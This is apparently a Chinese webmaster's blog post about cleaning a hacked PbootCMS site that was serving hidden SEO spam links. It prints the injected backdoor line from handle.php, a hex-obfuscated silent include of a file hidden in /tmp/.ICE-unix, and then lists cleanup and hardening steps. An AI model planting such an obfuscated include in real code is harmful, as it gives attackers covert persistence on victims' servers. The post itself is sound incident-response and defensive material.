pbootcms網站被黑記錄及查找根源 /core/function/handle.php ?$runtime_dir = PACK('H*','2F746D702F2E
今天在群里看到看到群友說站被黑了。
查看了一下自己的站,也發現了異常。
幾天收入量增加了兩萬
仔細看收入發現有很多。黑帽鏈接。
用站長工具查看。發現異常
代碼的位置在模板的最上方。
所以排查的方向先從偽靜態開始。
然后排查模板頂端。
然后再排查。Php入口文件。
都沒有發現問題,那么就可能是在內核文件中
我先清理了備份文件,然后用工具查詢了一下。
發現幾個異常文件,然后逐一排查。
最后發現是這個文件的問題。
/core/function/handle.php
惡意代碼
$runtime_dir = PACK('H*','2F746D702F2E4943452D756E69782F7169716930'); if(is_file($runtime_dir)){ @INCLUDE_ONCE($runtime_dir); }
用十六進制轉換一下。
找到文件位置。刪除,然后做好防護。
最終問題解決
最后的總結。這種情況在前臺幾乎無法查看,只有查看看百度的收錄異常才能發現。你直接打開網頁右鍵源碼時看不到任何問題的。
或者是用站長工具模擬搜索引擎抓取查看,可以看到異常。
1 屏蔽IP18.162.98.238
2 服務器 /tmp/.ICE-unix 文件禁止寫入
3 robots.txt禁止抓取
Disallow: *.asp
Disallow: /?*
Disallow: /app*
如果您的問題還未解決可以聯系站長付費協助。
有問題可以加入技術QQ群一起交流學習
本站vip會員 請加入無憂模板網 VIP群(50604020) PS:加入時備注用戶名或昵稱
普通注冊會員或訪客 請加入無憂模板網 技術交流群(50604130)
客服微信號:15898888535
聲明:本站所有文章資源內容,如無特殊說明或標注,均為采集網絡資源。如若內容侵犯了原著者的合法權益,可聯系站長刪除。
